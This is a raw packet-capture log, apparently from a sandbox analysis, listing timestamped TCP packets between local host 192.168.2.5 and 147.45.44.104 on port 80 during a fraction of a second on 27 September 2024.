Sep 27, 2024 00:15:16.129554033 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129566908 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.129595995 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.129874945 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129888058 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129899979 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.129975080 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130007029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130011082 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130021095 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130033016 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130045891 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130117893 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130117893 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130208015 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130219936 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130230904 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130242109 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130254030 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130254984 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130266905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130279064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130289078 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130290985 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130304098 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130323887 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130326986 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130338907 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130390882 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130506992 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130520105 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130532026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130543947 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130562067 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130568027 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130574942 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130588055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130595922 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130599022 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130613089 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130615950 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130625010 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130635023 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130637884 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130650997 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130662918 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130669117 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130676031 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130687952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130692005 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130701065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130728006 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130752087 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.130959988 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130983114 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.130995989 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131007910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131020069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131030083 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131052971 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131092072 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131110907 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131124973 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131134987 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131135941 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131149054 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131161928 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131170988 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131203890 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131321907 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131333113 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131344080 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131355047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131367922 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131371975 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131381989 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131396055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131408930 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131414890 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131421089 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131464005 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131782055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131793976 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131808043 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131834984 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131865978 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131894112 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131907940 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131922007 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131933928 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.131946087 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.131978989 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132005930 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132019043 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132030964 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132044077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132082939 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132153988 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132168055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132179022 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132190943 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132205009 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132211924 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132239103 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132316113 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132328033 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132338047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132349014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132363081 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132363081 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132381916 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132390976 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132396936 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132415056 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132419109 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132428885 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132441998 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132442951 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132467031 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132700920 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132713079 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132766008 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.132973909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132987022 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.132998943 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133021116 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.133049011 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.133101940 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133115053 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133126974 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133138895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133164883 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.133176088 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.133407116 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133419037 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133429050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133440971 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133452892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133464098 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133470058 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.133476019 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133487940 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133496046 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.133502007 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133546114 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.133919001 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133930922 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133944035 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133955002 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133968115 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133980989 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.133985996 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.133985996 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.133992910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134006023 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134026051 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.134037971 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.134186029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134327888 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.134356976 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134413958 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134430885 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134458065 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.134521961 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134532928 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134543896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134556055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134562016 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.134574890 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.134764910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134777069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134788990 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134800911 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134809971 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.134814024 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.134838104 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.134850979 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135036945 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135047913 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135059118 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135071039 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135083914 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135083914 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135097027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135123968 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135144949 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135350943 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135361910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135374069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135392904 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135405064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135416985 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135417938 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135447025 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135476112 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135593891 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135606050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135617018 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135634899 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135647058 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135649920 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135658026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135670900 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135682106 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135690928 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135694027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135710001 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135711908 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135723114 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135724068 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135736942 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135751009 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.135751963 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.135776997 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136121988 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136135101 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136146069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136157036 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136164904 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136169910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136179924 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136183977 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136195898 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136207104 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136209011 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136250019 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136392117 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136405945 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136420965 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136435032 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136435032 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136452913 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136461020 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136468887 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136482954 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136490107 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136497021 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136526108 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136682034 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136697054 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136710882 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136723042 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136723995 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136739969 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136750937 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136756897 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136771917 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136779070 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136787891 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136814117 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.136970997 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.136985064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137000084 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137013912 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137020111 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137029886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137043953 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137051105 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137061119 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137088060 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137109041 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137119055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137134075 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137147903 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137161970 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137171030 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137175083 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137186050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137200117 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137201071 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137217045 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137232065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137247086 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137248039 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137274981 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137324095 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137705088 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137721062 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137734890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137748957 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137763023 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137763977 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137782097 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137792110 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137804985 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137821913 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137839079 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137852907 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137868881 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137886047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137895107 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137900114 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137914896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137921095 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137931108 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137943029 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137945890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137963057 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137969971 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.137978077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137990952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.137996912 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138008118 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138021946 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138034105 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138036966 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138052940 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138056040 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138070107 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138084888 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138092041 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138098955 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138135910 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138654947 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138669014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138684988 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138698101 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138712883 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138725042 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138729095 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138745070 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138758898 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138761044 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138776064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138789892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138802052 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138813972 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138828993 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138842106 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138845921 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138856888 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138868093 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138874054 CEST	80	49711	147.45.44.104	192.168.2.5
